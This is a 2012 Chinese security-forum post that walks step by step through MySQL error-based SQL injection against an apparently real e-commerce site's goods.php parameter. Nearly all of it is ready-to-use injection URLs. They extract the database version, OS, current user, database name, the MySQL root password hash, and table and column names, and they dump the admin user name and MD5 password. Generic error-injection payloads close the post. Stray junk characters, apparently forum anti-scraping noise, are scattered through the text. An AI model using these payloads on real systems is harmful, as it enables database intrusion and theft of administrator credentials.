找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2228|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
8 m" H& q) H' D  Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 W" g' y& n0 ~  n" x( |( A) z

$ p$ c) v4 r& z判断系统
3 `" n1 a3 V! l, y7 P( J5 n7 v( p1 ~# Y  \% v: T% z1 i: J* y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 k; w8 {& t* x

1 H! W  i3 h. o. d0 G: x# W" ^: H* P9 c) }. A" k% @6 P

- |; |" ?0 ~- M% i0 h7 H' Q+ o当前 user()2 Z) P3 N9 I+ d+ W! D! T

- _" E( }& `1 N: \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 h5 J3 L9 x# \: H( y

/ X5 u6 L2 y" j9 r/ b/ d( O3 O+ E& }
, X/ m# z: `: @7 g+ {. Z
当前 database()& B. ~  Q2 b. h6 i9 _# [/ S
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ D$ u4 y( }( r2 D, H3 A
: H: a9 ?- B7 j2 S/ L0 b' m1 I' z8 R/ `) f$ |
# D* r( k) n3 n$ H( A" H/ `

$ {. u& Q, Z; q9 `/ q. Droot hash
( G* Y0 z2 Z( ]. F4 @) R* y% h: D; \" m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 E: T% ~8 O# h& H# S5 _, I2 ~+ \" K1 a

2 _' W" h" M# Y) a% R
7 q  ^, o% {0 w; S- u1 x当前 数据库表名
5 R3 ~3 [# d' b; }" C
3 D: v2 p5 }4 s) Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- F8 I( v9 U1 M% |. _  ]5 G; N( w
) p& ^3 R; Y" `* V- i
1 d: s3 g) H* n7 ^
0 G$ C6 c/ S; n+ l# j当前 数据库 user_name 字段3 g0 ~% O) J3 c* z1 m

; @5 U$ n( A5 L$ Y2 f  e. Ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# f  i, ?7 W$ \
5 A4 y( g/ G/ D8 I& {. n* ^) h
当前 数据库 字段 password7 U" E# j. K, \8 V0 M5 |. C. j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% m( j+ h; H6 N1 M
+ f! L) i6 Q  a3 P& ?; f# [# T
2 z7 l7 n3 V9 J$ K
! g" I1 o7 |- r获得 admin passwd(md5)
  z2 F( e7 t/ f! S: J0 Y+ U6 e; X
, r4 O3 z# K$ k, ?$ z8 v+ X7 v( J
+ i0 y5 n5 [, e$ w/ s2 t8 Thttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 y0 F+ @# M9 p, z6 u: f. f9 @$ ]- n4 E2 F
报错注射
- s. p2 Y  a2 C2 d1 w  k6 s# CSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. |, t. V& u9 g& @5 |' i
' n% V' L! P  C4 C- ASELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
) I* X, i' @  n( p, r4 X' l* `+ @6 ?, u+ E5 i4 f3 ?) z" w4 ~
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表